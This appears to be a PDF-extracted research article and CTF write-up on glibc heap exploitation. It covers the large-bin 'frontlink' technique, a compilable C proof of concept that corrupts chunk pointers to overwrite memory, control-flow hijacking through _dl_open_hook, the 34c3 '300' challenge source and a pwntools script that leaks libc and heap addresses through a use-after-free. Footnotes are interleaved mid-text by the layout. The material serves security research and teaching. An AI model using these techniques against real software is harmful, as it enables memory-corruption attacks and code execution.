GlibC malloc handles its freed chunks in bins. A bin is a linked list of chunks which share some attributes. There are four types of bins: fast, unsorted, small, and large. The large bins contain freed chunks of a specific size-range, sorted by size. Putting a chunk in a large bin happens only after sorting it, extracting it from the unsorted bin and putting it in the appropriate small or large bin. The
21 unzip pocorgtfo18.pdf mallocdesmaleficarum.txt # Phrack 66:10
22 unzip pocorgtfo18.pdf yetanotherfree.txt # Phrack 66:6
23 Another promising pointer is the _IO_list_all pointer, or any pointer to the FILE struct. The implications of overwriting

this pointer are explained in the House of Orange. In recent glibc versions, corruption of FILE vtables has been mitigated to
some extent, therefore it’s harder to use than _dl_open_hook. Ironically, this mitigation uses _dl_open_hook and this is how I
got to play with it in the first place. To read more about _IO_list_all and overwriting FILE vtables, see Angelboy’s excellent
HITCON 2016 CTF qualifier post. To see how to bypass the mitigation, see my own 300 CTF challenge.
unzip pocorgtfo18.pdf 300writeup.md

sorting process happens when a user requests an allocation which can’t be satisfied by the fast or small bins. When such a request is made, the allocator iterates over the chunks in the unsorted bin and puts each chunk where it belongs. After sorting the unsorted bin, the allocator applies a best-fit algorithm and tries to find the smallest freed chunk that can satisfy the user’s request. As a large bin contains chunks of multiple sizes, every chunk in the bin not only points to the previous and next chunk (bk and fd) in the bin but also points to the nearest chunks of the next smaller and next bigger size (fd_nextsize and bk_nextsize). Chunks in a large bin are sorted by size, and these pointers speed up the search for the best fit chunk.

Figure 13 illustrates a large bin with seven chunks of three sizes. Figure 12 contains the relevant code from _int_malloc.24

Here, the size variable is the size of the victim chunk which is removed from the unsorted bin. The logic in lines 3566–3620 tries to determine between which bck and fwd chunks it should be inserted. Then, in lines 3622–3626, it is actually inserted into the list. In the case that the victim chunk belongs in a small bin, bck and fwd are trivial. As all chunks in a small bin have the same size, it does not matter where in the bin it is inserted, so bck is the head of the bin and fwd is the first chunk in the bin (lines 3568–3573). However, if the chunk belongs in a large bin, as there are chunks of various sizes in the bin, it must be inserted in the right place to keep the bin sorted.

If the large bin is not empty (line 3581) the code iterates over the chunks in the bin with a decreasing size until it finds the first chunk that is not larger than the victim chunk (lines 3599–3603). Now, if this chunk is of a size that already exists in the bin, there is no need to insert it into the nextsize list, so just put it after the current chunk (lines 3605–3607). If, on the other hand, it is of a new size, it needs to be inserted into the nextsize list (lines 3608–3614). Either way, eventually set the bck accordingly (line 3615) and continue to the insertion of the victim chunk into the linked list (lines 3622–3626).

The Frontlink Technique in 2018

So, remembering our nice theories, we need to consider how we can manipulate the list insertion to suit our needs. How can we control the fwd and bck pointers?

When the victim chunk belongs in a small bin, these values are hard to control. The bck is the address of the bin, an address in the globals section of glibc. And fwd is the value stored at bck->fd, which means it is also a value written in glibc’s global section. A simple heap vulnerability such as a Use-After-Free or Buffer Overflow does not let us corrupt this value in any immediate way, as these vulnerabilities usually corrupt data on the heap. (A different mapping entirely from glibc.) The fast bins and unsorted bin are equally unhelpful, as insertion to these bins is always done at the head of the list.

So our last option to consider is using the large bins. Here we see that some data from the chunks is used. The loop which iterates over the chunks in a large bin uses the fd_nextsize pointer to set the value of fwd, and the value of bck is derived from this pointer as well. As the chunk pointed to by fwd must meet our size requirement and the bck pointer is derived from it, we had better let it point to a real chunk in our control and only corrupt the bk of this chunk. Corrupting the bk means that line 3626 writes the address of the victim chunk to a location in our control. Even better, if the victim chunk is of a new size that does not previously exist in the bin, lines 3610–3613 insert this chunk into the nextsize list and write its address to fwd->bk_nextsize->fd_nextsize. This means we can write the address of the victim chunk to another location. Two writes for one corruption!

In summary, if we corrupt the bk and bk_nextsize of a chunk in the large bin and then cause malloc to insert another chunk with a bigger size, this will overwrite the locations that our bk and bk_nextsize values point to (at the fd and fd_nextsize offsets, respectively) with the address of the freed chunk.
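To make the two writes concrete, the large-bin branch of Figure 12 can be replayed on a toy model. The following is only a sketch under loud assumptions: chunks are plain Python objects instead of heap memory, the names Chunk, make_bin, largebin_insert and demo are invented for this illustration, and the PREV_INUSE bit and the asserts of the real code are ignored.

```python
class Chunk:
    """Toy stand-in for struct malloc_chunk; fields are object references."""
    def __init__(self, name, size=0):
        self.name = name
        self.size = size
        self.fd = self.bk = None
        self.fd_nextsize = self.bk_nextsize = None


def make_bin():
    """An empty bin is a header whose fd and bk point back to itself."""
    head = Chunk("bin")
    head.fd = head.bk = head
    return head


def largebin_insert(head, victim):
    """Replay of the large-bin branch of Figure 12 (lines 3577-3626)."""
    size = victim.size
    bck = head
    fwd = bck.fd
    if fwd is not bck:                        # line 3581: bin is not empty
        if size < bck.bk.size:                # line 3587: smaller than smallest
            fwd = bck
            bck = bck.bk
            victim.fd_nextsize = fwd.fd
            victim.bk_nextsize = fwd.fd.bk_nextsize
            victim.bk_nextsize.fd_nextsize = victim
            fwd.fd.bk_nextsize = victim
        else:
            while size < fwd.size:            # lines 3599-3603
                fwd = fwd.fd_nextsize
            if size == fwd.size:
                fwd = fwd.fd                  # line 3607
            else:                             # lines 3610-3613: a new size
                victim.fd_nextsize = fwd
                victim.bk_nextsize = fwd.bk_nextsize
                fwd.bk_nextsize = victim
                victim.bk_nextsize.fd_nextsize = victim   # second write
            bck = fwd.bk                      # line 3615
    else:
        victim.fd_nextsize = victim.bk_nextsize = victim  # line 3619
    victim.bk = bck                           # lines 3623-3626
    victim.fd = fwd
    fwd.bk = victim
    bck.fd = victim                           # first write


def demo():
    head = make_bin()
    p2 = Chunk("p2", 0x710)
    largebin_insert(head, p2)                 # legitimate insertion

    # The "vulnerability": point p2's bk and bk_nextsize at fake chunks
    # that stand for two attacker-chosen memory locations.
    target_a = Chunk("target_a")
    target_b = Chunk("target_b")
    p2.bk = target_a
    p2.bk_nextsize = target_b

    p1 = Chunk("p1", 0x720)                   # bigger than p2, and a new size
    largebin_insert(head, p1)
    return p1, target_a, target_b


if __name__ == "__main__":
    p1, target_a, target_b = demo()
    print(target_a.fd is p1, target_b.fd_nextsize is p1)
```

In this model both target_a.fd and target_b.fd_nextsize end up referring to p1, which mirrors the "two writes for one corruption" described above. A real exploit has to satisfy constraints that the toy model leaves out, such as the size fields actually read from memory.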

24 All glibc code snippets in this paper are from version 2.24.

3504   while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
3505     {
3506       bck = victim->bk;
...
3511       size = chunksize (victim);
...
3549       /* remove from unsorted list */
3550       unsorted_chunks (av)->bk = bck;
3551       bck->fd = unsorted_chunks (av);
3552
3553       /* Take now instead of binning if exact fit */
3554
3555       if (size == nb)
3556         {
...
3561           void *p = chunk2mem (victim);
3562           alloc_perturb (p, bytes);
3563           return p;
3564         }
3565
3566       /* place chunk in bin */
3567
3568       if (in_smallbin_range (size))
3569         {
3570           victim_index = smallbin_index (size);
3571           bck = bin_at (av, victim_index);
3572           fwd = bck->fd;
3573         }
3574       else
3575         {
3576           victim_index = largebin_index (size);
3577           bck = bin_at (av, victim_index);
3578           fwd = bck->fd;
3579
3580           /* maintain large bins in sorted order */
3581           if (fwd != bck)
3582             {
3583               /* Or with inuse bit to speed comparisons */
3584               size |= PREV_INUSE;
3585               /* if smaller than smallest, bypass loop below */
3586               assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
3587               if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
3588                 {
3589                   fwd = bck;
3590                   bck = bck->bk;
3591
3592                   victim->fd_nextsize = fwd->fd;
3593                   victim->bk_nextsize = fwd->fd->bk_nextsize;
3594                   fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
3595                 }
3596               else
3597                 {
3598                   assert ((fwd->size & NON_MAIN_ARENA) == 0);
3599                   while ((unsigned long) size < fwd->size)
3600                     {
3601                       fwd = fwd->fd_nextsize;
3602                       assert ((fwd->size & NON_MAIN_ARENA) == 0);
3603                     }
3604
3605                   if ((unsigned long) size == (unsigned long) fwd->size)
3606                     /* Always insert in the second position. */
3607                     fwd = fwd->fd;
3608                   else
3609                     {
3610                       victim->fd_nextsize = fwd;
3611                       victim->bk_nextsize = fwd->bk_nextsize;
3612                       fwd->bk_nextsize = victim;
3613                       victim->bk_nextsize->fd_nextsize = victim;
3614                     }
3615                   bck = fwd->bk;
3616                 }
3617             }
3618           else
3619             victim->fd_nextsize = victim->bk_nextsize = victim;
3620         }
3621
3622       mark_bin (av, victim_index);
3623       victim->bk = bck;
3624       victim->fd = fwd;
3625       fwd->bk = victim;
3626       bck->fd = victim;
...
3631     }

Figure 12. Extract of _int_malloc.

+−−−−−−−−−−−−−−−−−−−−+
| UNSORTED BIN |
MAIN ARENA: +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+−−−−−−+−−−−−−+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
| | | fd | bk | | |
| | | | +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−> | + | | <−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
| | | | | | | | | | |
| +−−−−−−−−−−−−−−−−−−−−−−−−−−+−−+−−−−−−+−−−−−−+−−−+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ | |
| | | |
| +−−−−−−−−−−−−−−+ +−−−−−−−−−−−−−−+ +−−−−−−−−−−−−−−+ +−−−−−−−−−+ | |
| | +−−−−−−−−−−−−−−−−−−−−−−−−−−+ | | | | | | |
| | | | | | | | | | | |
| | | +−−−−−−−−−−−+ +−−−−−−−−−−−+ +−−−−−−−−−−−−+ | +−−−−−−−−−−+ |
| | | | | | | | | | | | | | | | | || |
| +−−−−−v−v−−−−−+ | | +−−−−v−v−−−−−−+ | | +−−−−v−v−−−−−−+ | | +−−−−−−v−−v−−−+ | | +−−−−−vv−−−−−−+ |
HEAP | | s i z e : 0 x420 | | | | s i z e : 0 x410 | | | | s i z e : 0 x410 | | | | s i z e : 0 x420 | | | | s i z e : 0 x400 | |
| +−−−−−−−−−−−−−+ | | +−−−−−−−−−−−−−+ | | +−−−−−−−−−−−−−+ | | +−−−−−−−−−−−−−+ | | +−−−−−−−−−−−−−+ |
| | fd +−−−+ | | fd +−−+ | | fd +−−+ | | fd +−−−+ | | fd +−−−−+
| +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+
+−−+ bk | +−+ bk | +−+ bk | +−−+ bk | +−+ bk |
+−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+
| f d _ n e x t s i z e +−−−+ | | | f d _ n e x t s i z e +−−−+ | | | f d _ n e x t s i z e +−−−−−−+

+−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ |
+−−+ b k _ n e x t s i z e | | | | +−−−+ b k _ n e x t s i z e | | | | +−−−+ b k _ n e x t s i z e | |
| +−−−−^−^−−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−−^−^−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−^−−^−−−−−+ |
| | | | | | | | | | | |
| | | +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ | |
| | | | | | | |
| | | | | | | |
| | +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ | |
| | | |
| +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
| |
| |
+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+

Figure 13. A Large Bin with Seven Chunks of Three Sizes


The Frontlink Technique in 2001

For the sake of historical justice, the following is the explanation of the frontlink technique concept from Vudo Malloc Tricks.25

This is the code of list insertion in the old implementation:

#define frontlink( A, P, S, IDX, BK, FD ) {            \
    if ( S < MAX_SMALLBIN_SIZE ) {                     \
        IDX = smallbin_index( S );                     \
        mark_binblock( A, IDX );                       \
        BK = bin_at( A, IDX );                         \
        FD = BK->fd;                                   \
        P->bk = BK;                                    \
        P->fd = FD;                                    \
        FD->bk = BK->fd = P;                           \
[1] } else {                                           \
        IDX = bin_index( S );                          \
        BK = bin_at( A, IDX );                         \
        FD = BK->fd;                                   \
        if ( FD == BK ) {                              \
            mark_binblock(A, IDX);                     \
        } else {                                       \
[2]         while ( FD != BK                           \
                    && S < chunksize(FD) ) {           \
[3]             FD = FD->fd;                           \
            }                                          \
[4]         BK = FD->bk;                               \
        }                                              \
        P->bk = BK;                                    \
        P->fd = FD;                                    \
[5]     FD->bk = BK->fd = P;                           \
    }                                                  \
}

And this is the description:

    If the free chunk P processed by frontlink() is not a small chunk, the code at line 1 is executed, and the proper doubly-linked list of free chunks is traversed (at line 2) until the place where P should be inserted is found. If the attacker managed to overwrite the forward pointer of one of the traversed chunks (read at line 3) with the address of a carefully crafted fake chunk, they could trick frontlink() into leaving the loop (2) while FD points to this fake chunk. Next the back pointer BK of that fake chunk would be read (at line 4) and the integer located at BK plus 8 bytes (8 is the offset of the fd field within a boundary tag) would be overwritten with the address of the chunk P (at line 5).

Bear in mind the implementation was somewhat different. The P referred to is the equivalent of our victim pointer and there was no secondary nextsize list.

The Universal Frontlink PoC

In theory we see both editions are the very same technique, and it seems what was working in 2001 is still working in 2018. It means we can write one PoC for all versions of glibc that were ever released!

Please, dear neighbor, compile the code in Figure 14 and execute it on any machine with any version of glibc and see if it works. I have tried it on Fedora Core 4 32-bit with glibc-2.3.5, Fedora 10 32-bit live, Fedora 11 32-bit and Ubuntu 16.04 and 17.10 64-bit. It worked on all of them.

We already covered the background of how the overwrite happens, now we have just a few small details to cover in order to understand this PoC in full.

Chunks within malloc are managed in a struct called malloc_chunk which I copied to the PoC. When allocating a chunk to the user, malloc uses only the size field and therefore the first byte the user can use coincides with the fd field. To get the pointer to the malloc_chunk, we use mem2chunk which subtracts the offset of the fd field in the malloc_chunk struct from the allocated pointer (also copied from glibc).

The prev_size of a chunk resides in the last sizeof(size_t) bytes of the previous chunk. It may only be accessed if the previous chunk is not allocated. But if it is allocated, the user may write whatever she wants there. The PoC writes the string “YES” to this exact place.

Another small detail is the allocation of ALLOCATION_BIG sizes. These allocations have two roles: First they make sure that the chunks are not coalesced (merged) and thus keep their sizes even when freed, but they also force the allocator to sort the unsorted bin when there is no free chunk ready to serve the request in a normal bin.

Now, the crux of the exploit is exactly as in theory. Allocate two large chunks, p1 and p2. Free and corrupt p2, which is in the large-bin. Then free and insert p1 into the bin. This insertion overwrites the
25 unzip pocorgtfo18.pdf vudo.txt # Phrack 57:8
26 Note that the loop in the beginning of the PoC main fills the per-thread caching mechanism introduced in GlibC version 2.26

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <string.h>
#include <stddef.h>

/* Copied from glibc-2.24 malloc/malloc.c */
#ifndef INTERNAL_SIZE_T
#define INTERNAL_SIZE_T size_t
#endif

/* The corresponding word size */
#define SIZE_SZ (sizeof(INTERNAL_SIZE_T))

struct malloc_chunk {
  INTERNAL_SIZE_T prev_size;  /* Size of previous chunk (if free). */
  INTERNAL_SIZE_T size;       /* Size in bytes, including overhead. */

  struct malloc_chunk *fd;    /* double links -- used only if free. */
  struct malloc_chunk *bk;

  /* Only used for large blocks: pointer to next larger size. */
  struct malloc_chunk *fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk *bk_nextsize;
};
typedef struct malloc_chunk *mchunkptr;

/* The smallest possible chunk */
#define MIN_CHUNK_SIZE (offsetof(struct malloc_chunk, fd_nextsize))
#define mem2chunk(mem) ((mchunkptr)((char *)(mem) - 2*SIZE_SZ))
/* End of malloc.c declarations */

#define ALLOCATION_BIG (0x800 - sizeof(size_t))

int main(int argc, char **argv) {
  char *YES = "YES";
  char *NO = "NOPE";
  int i;

  // fill the tcache - introduced in glibc 2.26
  for (i = 0; i < 64; i++) {
    void *tmp = malloc(MIN_CHUNK_SIZE + sizeof(size_t) * (1 + 2*i));
    malloc(ALLOCATION_BIG);
    free(tmp);
    malloc(ALLOCATION_BIG);
  }

  char *verdict = NO;
  printf("Should frontlink work? %s\n", verdict);

  // Make a small allocation and put the string "YES" at its end
  char *p0 = malloc(ALLOCATION_BIG);
  assert(strlen(YES) < sizeof(size_t)); // this is not an overflow
  memcpy(p0 + ALLOCATION_BIG - sizeof(size_t), YES, 1 + strlen(YES));

  // Make two allocations right after it and allocate a small chunk in between to separate
  void **p1 = malloc(0x720-8);
  malloc(ALLOCATION_BIG);
  void **p2 = malloc(0x710-8);
  malloc(ALLOCATION_BIG);

  // free third allocation and sort it into a large bin
  free(p2);
  malloc(ALLOCATION_BIG);

  /* Vulnerability! overwrite bk of p2 such that verdict coincides with the pointed chunk's fd */
  // p2[1] = ((void *)&verdict) - 2*sizeof(size_t);
  mem2chunk(p2)->bk = (mchunkptr)((char *)&verdict - offsetof(struct malloc_chunk, fd));
  /* back to normal behaviour */

  // free the second allocation and sort it
  // this will overwrite verdict with a pointer to the end of p0 - where we put "YES"
  free(p1);
  malloc(ALLOCATION_BIG);

  // check if it worked
  printf("Does frontlink work? %s\n", verdict);
  return 0;
}

Figure 14. Universal Frontlink PoC
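The claim that the “YES” string lands exactly on the header of the chunk that follows p0 can be checked with a little arithmetic. The sketch below is not part of the PoC: it assumes a 64-bit target (SIZE_SZ of 8), assumes p1's chunk is placed directly after p0's chunk, uses a made-up address for p0, and re-implements glibc's request2size rounding from memory as a simplified helper. The names yes_address and following_chunk are hypothetical.

```python
SIZE_SZ = 8                           # sizeof(size_t); 64-bit target assumed
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1   # chunks are aligned to 2 * SIZE_SZ
MINSIZE = 4 * SIZE_SZ                 # smallest chunk: prev_size, size, fd, bk
ALLOCATION_BIG = 0x800 - SIZE_SZ      # same constant as in Figure 14


def request2size(req):
    """Chunk size used for a request of req bytes (sketch of glibc's macro)."""
    padded = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(padded, MINSIZE)


def mem2chunk(mem):
    """User pointer -> chunk header, as in Figure 14."""
    return mem - 2 * SIZE_SZ


def yes_address(p0):
    """Where the PoC copies "YES": the last SIZE_SZ bytes of p0's buffer."""
    return p0 + ALLOCATION_BIG - SIZE_SZ


def following_chunk(p0):
    """Header of the chunk placed directly after p0's chunk."""
    return mem2chunk(p0) + request2size(ALLOCATION_BIG)


if __name__ == "__main__":
    p0 = 0x602010                     # made-up user pointer, for illustration
    print(hex(request2size(ALLOCATION_BIG)))
    print(hex(yes_address(p0)), hex(following_chunk(p0)))
```

Under these assumptions both addresses coincide, so the pointer mem2chunk(p1) that the insertion writes into verdict points at the bytes holding “YES”.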

verdict pointer with mem2chunk(p1), which points to the last sizeof(size_t) bytes of p0.26

Control PC or GTFO

Now that we have frontlink covered, and we know how to overwrite a pointer to data in our control, it’s time to control the flow. The best victim to overwrite is _dl_open_hook. This pointer in glibc, when not NULL, is used to alter the behavior of dlopen, dlsym, and dlclose. If set, an invocation of any of these functions will use a callback in the struct dl_open_hook pointed to by _dl_open_hook. It’s a very simple structure.

struct dl_open_hook {
  void *(*dlopen_mode) (const char *name, int mode);
  void *(*dlsym) (void *map, const char *name);
  int (*dlclose) (void *map);
};

When invoking dlopen, it actually calls dlopen_mode which has the following implementation:

if (__glibc_unlikely (_dl_open_hook != NULL))
  return _dl_open_hook->dlopen_mode (name, mode);

Thus, controlling the data pointed to by _dl_open_hook and being able to trigger a call to dlopen is sufficient for hijacking a program’s flow.

Now, it’s time for some magic. dlopen is not a very common function to use. Most binaries know at compile time which libraries they are going to use, or at least in the program initialization process, and don’t use dlopen during the program’s normal operation. So causing a dlopen invocation may be far fetched in many circumstances. Fortunately, we are in a very specific scenario here: a heap corruption. By default, when the heap code fails an integrity check, it uses malloc_printerr to print the error to the user using __libc_message. After printing the error and before calling abort, __libc_message prints a backtrace and memory maps. The function generating the backtrace and memory maps is backtrace_and_maps which calls the architecture-specific function __backtrace. On x86_64, this function calls a static init function which tries to dlopen libgcc_s.so.1.

So if we manage to fail an integrity check, we can trigger dlopen which in turn will use data pointed to by _dl_open_hook to change the program’s flow. Win!

Madness? Exploit 300!

Now that we know everything there is to know, it’s time to use this technique in the real world. For PoC purposes, we solve the 300 CTF challenge from the last Chaos Communication Congress, 34c3.

Here is the source code of the challenge, courtesy of its challenge author, Stephen Röttger, a.k.a. Tsuro:

#include <unistd.h>
#include <string.h>
#include <err.h>
#include <stdlib.h>

#define ALLOC_CNT 10

char *allocs[ALLOC_CNT] = {0};

void myputs(const char *s) {
  write(1, s, strlen(s));
  write(1, "\n", 1);
}

int read_int() {
  char buf[16] = "";
  ssize_t cnt = read(0, buf, sizeof(buf)-1);
  if (cnt <= 0) {
    err(1, "read");
  }
  buf[cnt] = 0;
  return atoi(buf);
}

void menu() {
  myputs("1) alloc");
  myputs("2) write");
  myputs("3) print");
  myputs("4) free");
}

void alloc_it(int slot) {
  allocs[slot] = malloc(0x300);
}

void write_it(int slot) {
  read(0, allocs[slot], 0x300);
}

void print_it(int slot) {
  myputs(allocs[slot]);
}
with commit d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc. After filling this cache, all our operations will behave as expected.
Understanding it is beyond the scope of this paper, and on versions before 2.26 it can be removed.


void free_it(int slot) {
  free(allocs[slot]);
}

int main(int argc, char *argv[]) {
  while (1) {
    menu();
    int choice = read_int();
    myputs("slot? (0-9)");
    int slot = read_int();
    if (slot < 0 || slot > 9) {
      exit(0);
    }
    switch (choice) {
      case 1:
        alloc_it(slot);
        break;
      case 2:
        write_it(slot);
        break;
      case 3:
        print_it(slot);
        break;
      case 4:
        free_it(slot);
        break;
      default:
        exit(0);
    }
  }
  return 0;
}

The purpose of the challenge is to execute arbitrary code on a remote service executing the code above. We see that in the globals section there is an array of ten pointers. As clients, we have the following options:

1. Allocate a chunk of size 0x300 and assign its address to any of the pointers in the array.

2. Write 0x300 bytes to a chunk pointed to by a pointer in the array.

3. Print the contents of any chunk pointed to in the array.

4. Free any pointer in the array.

5. Exit.

The vulnerability here is straightforward: Use-After-Free. As no code ever zeros the pointers in the array, the chunks pointed to by them are accessible after free. It is also possible to double-free a pointer.

A solution to a challenge always starts with some boilerplate: defining functions to invoke specific functions in the remote target, and some convenience functions. We use the brilliant Pwn library for communication with the vulnerable process, conversion of values, parsing ELF files and probably some other things.27

The boilerplate code is quite self-explanatory. alloc_it, print_it, write_it, free_it invoke their corresponding functions in the remote target. The chunk function receives an offset and a dictionary of fields of a malloc_chunk and their values and returns a dictionary of the offsets to which the values should be written. For example, chunk(offset=0x20, bk=0xdeadbeef) returns {56: 3735928559} as the offset of the bk field is 0x18, thus 0x18 + 0x20 is 56 (and 0xdeadbeef is 3735928559). The chunk function is used in combination with pwn’s fit function which writes specific values at specific offsets.28

Now, the first thing we want to do to solve this challenge is to know the base address of libc, so we can derive the locations of various data in libc, and also the address of the heap, so we can craft pointers to our controlled data.

As we can print chunks after freeing them, leaking these addresses is quite easy. By freeing two non-consecutive chunks and reading their fd pointers (the field which coincides with the pointer returned to the caller when a chunk is allocated), we can read the address of the unsorted bin because the first chunk in it points to its address. And we can also read the address of that chunk by reading the fd pointer of the second freed chunk, because it points to the first chunk in the bin. See Figure 15.
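The offset arithmetic behind the chunk helper described above can be tried without pwntools. This is a minimal sketch, not the author's code: chunk_offsets mirrors the described behaviour for 8-byte fields, while place is a hypothetical, simplified stand-in for pwn's fit that pads with zero bytes instead of pwntools' cyclic filler.

```python
import struct

# Field order of struct malloc_chunk; each field is 8 bytes on amd64.
FIELDS = ['prev_size', 'size', 'fd', 'bk', 'fd_nextsize', 'bk_nextsize']


def chunk_offsets(offset=0, **fields):
    """Map {field: value} to {byte offset: value}, relative to offset."""
    offs = {name: index * 8 for index, name in enumerate(FIELDS)}
    return {offset + offs[name]: value for name, value in fields.items()}


def place(values, filler=b'\x00'):
    """Simplified stand-in for fit: write 64-bit little-endian values
    at the given non-negative offsets, padding the gaps with filler."""
    end = max(values) + 8
    buf = bytearray(filler * end)
    for off, val in values.items():
        buf[off:off + 8] = struct.pack('<Q', val)
    return bytes(buf)


if __name__ == "__main__":
    offsets = chunk_offsets(offset=0x20, bk=0xdeadbeef)
    print(offsets)
    print(place(offsets).hex())
```

A negative offset, as used later with offset=-0x10, simply shifts every field back: the bk field then lands at byte 8 of the written buffer.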
27 http://docs.pwntools.com/en/stable/index.html
28 The base parameter is just for pretty-printing the hexdumps in the real memory addresses

import time
from pwn import *

LIBC_FILE = './libc.so.6'
libc = ELF(LIBC_FILE)
main = ELF('./300')

context.arch = 'amd64'

r = main.process(env={'LD_PRELOAD': libc.path})

d2 = success
def menu(sel, slot):
    r.sendlineafter('4) free\n', str(sel))
    r.sendlineafter('slot? (0-9)\n', str(slot))

def alloc_it(slot):
    d2("alloc {}".format(slot))
    menu(1, slot)

def print_it(slot):
    d2("print {}".format(slot))
    menu(3, slot)
    ret = r.recvuntil('\n1)', drop=True)
    d2("received:\n{}".format(hexdump(ret)))
    return ret

def write_it(slot, buf, base=0):
    d2("write {}:\n{}".format(slot, hexdump(buf, begin=base)))
    menu(2, slot)
    ## The interaction with the binary is too fast, and some of the data is not
    ## written properly. This short delay fixes it.
    time.sleep(0.001)
    r.send(buf)

def free_it(slot):
    d2("free {}".format(slot))
    menu(4, slot)

def merge_dicts(*dicts):
    """ return sum(dicts) """
    return {k: v for d in dicts for k, v in d.items()}

def chunk(offset=0, base=0, **kwargs):
    """ build dictionary of offsets and values according to field name and base offset """
    fields = ['prev_size', 'size', 'fd', 'bk', 'fd_nextsize', 'bk_nextsize',]
    d2("craft chunk{}: {}".format(
        ' ({:#x})'.format(base + offset) if base else '',
        ' '.join('{}={:#x}'.format(name, kwargs[name]) for name in fields if name in kwargs)))

    offs = {name: off*8 for off, name in enumerate(fields)}
    return {offset+offs[name]: kwargs[name] for name in fields if name in kwargs}

## uncomment the next line to see extra communication and debug strings
#context.log_level = 'debug'

+−−−−−−−−−−−−−−−−+
2 | UNSORTED BIN |
+−−−−−−−−−−−−−−−−−−−−−−−−−−−+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
4 | | fd | bk | |
MAIN ARENA | +−−−−−−−−−−−−−> | <−−−−−−−−−−−−−−+ |
6 | | | | | | |
| | +−−−−−−−−−+ | +−−−−−−−−−−−−+ | |
8 | | | | | | | | |
+−−−−−−−−−−−−−−−−−−−+−−−−−−−+−−−−−−−−+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
10 | | | |
| | +−−−−−−−−−−−−−−−−−−−+ | |
12 | | | | | |
| | | +−−−−−−−−−−−−−−−−−−−−+ | |
14 | | | | | | | |
| +−−v−v−−−+ | | +−−v−v−−−+ |
16 HEAP | | CHUNK3 | | | | CHUNK1 | |
| +−−−−−−−−+ | | +−−−−−−−−+ |
18 | | fd +−−+ | | fd +−−+
| +−−−−−−−−+ | +−−−−−−−−+
20 +−−−+ bk | +−−−−+ bk |
+−−−−−−−−+ +−−−−−−−−+

Figure 15

We can quickly test this arrangement in Python.

info("leaking unsorted bin address")
alloc_it(0)
alloc_it(1)
alloc_it(2)
alloc_it(3)
alloc_it(4)
free_it(1)
free_it(3)
leak = print_it(1)
unsorted_bin = u64(leak.ljust(8, '\x00'))
info('unsorted bin {:#x}'.format(
    unsorted_bin))
UNSORTED_OFFSET = 0x3c1b58
libc.address = unsorted_bin - UNSORTED_OFFSET
info("libc base address {:#x}".format(
    libc.address))

info("leaking heap")
leak = print_it(3)
chunk1_addr = u64(leak.ljust(8, '\x00'))
heap_base = chunk1_addr - 0x310
info('heap {:#x}'.format(heap_base))

info("cleaning all allocations")
free_it(0)
free_it(2)
free_it(4)

It will produce something like the following output.

[*] leaking unsorted bin address
[+] alloc 0
[+] alloc 1
[+] alloc 2
[+] alloc 3
[+] alloc 4
[+] free 1
[+] free 3
[+] print 1
[+] received:
    00000000  58 db 45 3f 55 7f
[*] unsorted bin 0x7f553f45db58
[*] libc base address 0x7f553f09c000
[*] leaking heap
[+] print 3
[+] received:
    00000000  10 c3 84 6e 0a 56
[*] heap 0x560a6e84c000
[*] cleaning all allocations
[+] free 0
[+] free 2
[+] free 4
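The address arithmetic in this step can be replayed offline from the bytes shown in the sample output. The sketch below uses only the Python standard library in place of pwn's u64; the helper name leak_to_int is made up here, and the two offsets are taken from the listing above, so they are specific to the libc build and heap layout used in the challenge.

```python
UNSORTED_OFFSET = 0x3c1b58   # unsorted bin offset inside this particular libc
CHUNK1_OFFSET = 0x310        # chunk 1 follows chunk 0, whose chunk size is 0x310


def leak_to_int(leak):
    """Zero-pad a leaked little-endian pointer to 8 bytes and decode it."""
    return int.from_bytes(leak.ljust(8, b'\x00'), 'little')


# Bytes as printed in the sample output for slots 1 and 3.
unsorted_bin = leak_to_int(bytes.fromhex('58db453f557f'))
chunk1_addr = leak_to_int(bytes.fromhex('10c3846e0a56'))

libc_base = unsorted_bin - UNSORTED_OFFSET
heap_base = chunk1_addr - CHUNK1_OFFSET

if __name__ == "__main__":
    print(hex(unsorted_bin), hex(libc_base))
    print(hex(chunk1_addr), hex(heap_base))
```

The leak is shorter than eight bytes because myputs stops at the first NUL byte, which is why the padding step is needed before decoding.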

